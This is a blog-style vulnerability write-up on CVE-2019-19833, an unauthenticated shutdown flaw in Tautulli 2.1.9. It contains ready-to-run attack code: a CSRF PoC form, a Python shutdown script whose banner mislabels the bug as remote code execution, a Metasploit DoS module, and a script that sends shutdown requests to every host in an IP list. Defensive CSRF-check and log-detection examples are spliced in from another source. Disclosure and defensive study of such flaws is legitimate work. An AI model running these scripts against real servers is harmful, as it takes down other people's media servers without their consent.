Tautulli 2.1.9: Cross-Site Request Forgery (ShutDown) and Denial of Service (Metasploit)

Ismail Tasdelen
Published in InfoSec Write-ups
4 min read · Dec 26, 2022

Tautulli 2.1.9 (CVE-2019-19833)

While doing security research, I came across a product called Tautulli and started to examine the application. I discovered two security issues in this product: a CSRF vulnerability and a denial-of-service (DoS) effect. As a result, the media server could be shut down remotely.

The main problem was anonymous access to the /shutdown endpoint. I discovered this after a long struggle.

Details :

In Tautulli v2.1.9, it was found that on installations without a user login configured, the /shutdown endpoint can be reached anonymously and the remote media server can be shut down.

What is Tautulli?

Tautulli is a third-party application that allows you to monitor and track your Plex Media Server activity. It provides a web-based interface that lets you view statistics and information about your media library, including what has been watched, by whom, and on what device. Tautulli also offers several features to help you manage your Plex Media Server, such as viewing and deleting users, updating media metadata, and setting up notifications for specific events.

Tautulli is written in Python and can be installed on various platforms, including Windows, macOS, and Linux. It requires a Plex Media Server to be running to function and can be accessed via a web browser using the server's IP address and the port specified during installation.

In addition to its core features, Tautulli offers several optional plugins that can add additional functionality, such as updating media metadata automatically or sending notifications via Discord.

Exploit Information :

Exploit Title: Tautulli 2.1.9 — Cross-Site Request Forgery (ShutDown)

Exploit Author: Ismail Tasdelen

Vendor Homepage: https://tautulli.com/

Software : https://github.com/Tautulli/Tautulli

Product Version: v2.1.9

Platform: Windows 10 (10.0.18362)

Python Version: 2.7.11 (v2.7.11:6d1b6a68f775, Dec 5 2015, 20:40:30) [MSC v.1500 64 bit (AMD64)]

Vulnerability Type : Cross-Site Request Forgery (ShutDown)

Vulnerability : Cross-Site Request Forgery

CVE : CVE-2019-19833

In Tautulli 2.1.9, CSRF in the /shutdown URI allows an attacker to shut down the remote media server. (Also, anonymous access can be achieved in applications that do not have a user login area).

CVSS Score :

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

HTTP GET Request :

GET /shutdown HTTP/1.1
Host: XXX.XXX.XXX.XXX:8181
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://XXX.XXX.XXX.XXX:8181/home
Upgrade-Insecure-Requests: 1

CSRF PoC HTML :

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://XXX.XXX.XXX.XXX:8181/shutdown">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
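The PoC above works because /shutdown accepts a plain GET with no session and no anti-CSRF token, so any page an operator happens to visit can submit the form. The following is an added example, not code from Tautulli or from the original post, showing the checks a state-changing endpoint needs to refuse that request: state changes only over POST, an authenticated session, a same-origin Origin/Referer, and a per-session token compared in constant time. The Request and SessionStore classes, the check_state_change function and the 192.0.2.10:8181 host are assumptions made for the example.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlsplit

# Endpoints the write-up names as reachable without a login.
STATE_CHANGING = {"/shutdown", "/restart", "/update_check"}


@dataclass
class Request:
    """Hypothetical, framework-agnostic view of an incoming HTTP request."""
    method: str
    path: str
    host: str                                   # value of the Host header
    headers: Dict[str, str] = field(default_factory=dict)
    form: Dict[str, str] = field(default_factory=dict)
    session_id: Optional[str] = None            # from a cookie; None when anonymous


class SessionStore:
    """Hypothetical session store: one random CSRF token per logged-in session."""

    def __init__(self) -> None:
        self._tokens: Dict[str, str] = {}

    def login(self) -> str:
        sid = secrets.token_urlsafe(16)
        self._tokens[sid] = secrets.token_urlsafe(32)
        return sid

    def csrf_token(self, sid: str) -> Optional[str]:
        return self._tokens.get(sid)


def _same_origin(req: Request) -> bool:
    """Origin (preferred) or Referer must name the same host:port as the Host header."""
    src = req.headers.get("Origin") or req.headers.get("Referer")
    if not src:
        return False
    return urlsplit(src).netloc == req.host


def check_state_change(req: Request, sessions: SessionStore) -> Tuple[bool, str]:
    """Return (allowed, reason) for a request; non-sensitive paths pass through."""
    if req.path not in STATE_CHANGING:
        return True, "not a state-changing endpoint"
    # 1. A GET must never change state: an <img> or auto-submitted form cannot carry a token.
    if req.method != "POST":
        return False, "method not allowed"
    # 2. Anonymous callers are refused (the vulnerable build had no login at all).
    if req.session_id is None or sessions.csrf_token(req.session_id) is None:
        return False, "authentication required"
    # 3. Cross-site origins are refused even when the browser attached a session cookie.
    if not _same_origin(req):
        return False, "cross-origin request"
    # 4. The per-session token must match, compared in constant time.
    expected = sessions.csrf_token(req.session_id)
    supplied = req.form.get("csrf_token", "")
    if not hmac.compare_digest(expected, supplied):
        return False, "missing or invalid CSRF token"
    return True, "ok"


def demo() -> List[str]:
    """Run the five cases from the write-up's scenario and return the reasons."""
    sessions = SessionStore()
    sid = sessions.login()
    token = sessions.csrf_token(sid)
    host = "192.0.2.10:8181"                    # assumed server address
    cases = [
        # the write-up's request: bare GET, same-host Referer, no session
        Request("GET", "/shutdown", host, {"Referer": f"http://{host}/home"}),
        # POST but anonymous
        Request("POST", "/shutdown", host, {"Origin": f"http://{host}"}),
        # logged in, valid token, but submitted from another site
        Request("POST", "/shutdown", host, {"Origin": "http://evil.example"},
                {"csrf_token": token}, sid),
        # logged in, same origin, wrong token
        Request("POST", "/shutdown", host, {"Origin": f"http://{host}"},
                {"csrf_token": "nope"}, sid),
        # the only request that should be honoured
        Request("POST", "/shutdown", host, {"Origin": f"http://{host}"},
                {"csrf_token": token}, sid),
    ]
    return [check_state_change(r, sessions)[1] for r in cases]


if __name__ == "__main__":
    for reason in demo():
        print(reason)
```

The order of the checks matters: refusing GET first means a CSRF page has no way to deliver the token at all, and checking authentication before the origin keeps the anonymous case (the one the write-up actually found) from ever reaching the token comparison.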

Python Code :

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import requests

icon = """
_____ __ _ _ _____ _ _ _ _ _ _ _ ___ __ ___
|_ _/ \| || |_ _| || | | | | | | | \ / (_ | / |/ _ \
| || /\ | \/ | | | | \/ | |_| |_| | `\ V /'/ /__`7 |\__ /
|_||_||_|\__/ |_| \__/|___|___|_| \_/ |___\/ |_\//_/
Unauthenticated Remote Code Execution
by Ismail Tasdelen
"""

print(icon)

host = input("[+] HOST: ")
port = input("[+] PORT: ")

response = requests.get("http://" + host + ":" + port + "/" + "shutdown")  # You can also run the restart and update_check commands.

if response.status_code == 200:
    print('[✓] Success!')
elif response.status_code != 200:
    print('[✗] Unsuccessful!')
else:
    exit()

Denial of Service (Metasploit) :

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize
    super(
      'Name' => 'Tautulli v2.1.9 - Shutdown Denial of Service',
      'Description' => 'Tautulli versions 2.1.9 and prior are vulnerable to denial of service via the /shutdown URL.',
      'Author' => 'Ismail Tasdelen',
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['CVE', '2019-19833'],
          ['EDB', '47785']
        ]
    )
    register_options([ Opt::RPORT(8181) ])
  end

  def run
    res = send_request_raw({
      'method' => 'GET',
      'uri' => '/shutdown'
    })

    if res
      print_status("Request sent to #{rhost}")
    else
      print_status("No reply from #{rhost}")
    end
  rescue Errno::ECONNRESET
    print_status('Connection reset')
  end
end

Next comes an attack script. Written in Python, it reads a list of IPs or hostnames from a file, checks whether each entry already carries an http:// or https:// scheme, and sends a request to the /shutdown endpoint on port 8181 with a Firefox User-Agent, as follows.

import requests

# Read the IP list from the file
with open('ip_list.txt', 'r') as f:
    ip_list = f.readlines()

# Iterate over the IP list
for ip in ip_list:
    ip = ip.strip()  # Remove any whitespace from the end of the line
    if not ip.startswith('http://') and not ip.startswith('https://'):
        # The IP is not using HTTP or HTTPS, so send the request
        url = f'http://{ip}:8181/shutdown'
        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0'}
        response = requests.get(url, headers=headers)
        print(response.status_code)  # Print the HTTP status code of the response
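On the defender's side, a sweep like the one above leaves a characteristic trail in the reverse-proxy or application access log: GET requests to /shutdown (or the restart and update_check commands the write-up mentions) with no authenticated user, sometimes with a Referer pointing at another site, sometimes from a scripting client. The detector below is an added example, not part of the original post or of Tautulli: it parses combined-format access-log lines and flags exactly those hits. The log lines, the addresses and the SERVER_HOST value are constructed for the example, and the field names are assumptions.

```python
import re
from collections import Counter
from typing import Dict, List, Optional
from urllib.parse import urlsplit

# Constructed sample access-log lines in "combined" format; the addresses,
# user names and timestamps are made up for this example.
SAMPLE_LOG = """\
192.0.2.50 - - [26/Dec/2022:10:00:01 +0000] "GET /home HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0"
198.51.100.7 - - [26/Dec/2022:10:00:05 +0000] "GET /shutdown HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0"
198.51.100.7 - - [26/Dec/2022:10:00:06 +0000] "GET /restart HTTP/1.1" 200 0 "-" "python-requests/2.28.1"
192.0.2.50 - - [26/Dec/2022:10:02:11 +0000] "GET /shutdown HTTP/1.1" 200 0 "http://evil.example/csrf.html" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"
192.0.2.50 - admin [26/Dec/2022:10:05:00 +0000] "POST /shutdown HTTP/1.1" 200 0 "http://192.0.2.10:8181/settings" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"
"""

# One "combined" log line: ip ident user [ts] "method path proto" status bytes "referer" "ua"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Endpoints the write-up names as reachable without a login.
SENSITIVE_PATHS = {"/shutdown", "/restart", "/update_check"}
# host:port of the monitored instance (assumed value for the example).
SERVER_HOST = "192.0.2.10:8181"
# User-Agent prefixes of common scripting clients (constructed list).
SCRIPTED_UA_PREFIXES = ("python-requests/", "curl/")


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into named fields, or None if it does not parse."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def classify(rec: Dict[str, str]) -> List[str]:
    """Reasons a hit on a sensitive endpoint looks like CVE-2019-19833 abuse."""
    if rec["path"] not in SENSITIVE_PATHS:
        return []
    reasons: List[str] = []
    if rec["method"] == "GET":
        reasons.append("state change via GET")
    if rec["user"] == "-":
        reasons.append("no authenticated user")
    referer = rec["referer"] if rec["referer"] not in ("", "-") else None
    if referer and urlsplit(referer).netloc != SERVER_HOST:
        reasons.append("cross-origin referer")
    if rec["ua"].startswith(SCRIPTED_UA_PREFIXES):
        reasons.append("scripted client")
    return reasons


def detect(log_text: str) -> List[Dict[str, object]]:
    """Return one alert per suspicious sensitive-endpoint hit, in log order."""
    alerts: List[Dict[str, object]] = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec)
        if reasons:
            alerts.append({
                "ip": rec["ip"], "ts": rec["ts"], "method": rec["method"],
                "path": rec["path"], "status": rec["status"], "reasons": reasons,
            })
    return alerts


def hits_per_source(alerts: List[Dict[str, object]]) -> Counter:
    """Count alerts per client address to surface a host that walks several commands."""
    return Counter(str(a["ip"]) for a in alerts)


if __name__ == "__main__":
    found = detect(SAMPLE_LOG)
    for alert in found:
        print(alert)
    print(hits_per_source(found))
```

Run against the sample, the detector raises three alerts (the two anonymous GETs from 198.51.100.7 and the cross-origin GET from 192.0.2.50) and stays quiet on the authenticated, same-origin POST, which is what the endpoint should look like once it is fixed. The same rules translate directly into a SIEM query: method, path, the presence of an authenticated user and the Referer host are all standard access-log fields.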

In this article, I mentioned a security issue that I discovered in the past years. Take care and see you in my next post.

I'm Ismail Tasdelen. I have been working in the cyber security industry for +7 years. Don't forget to follow and applaud to support my content.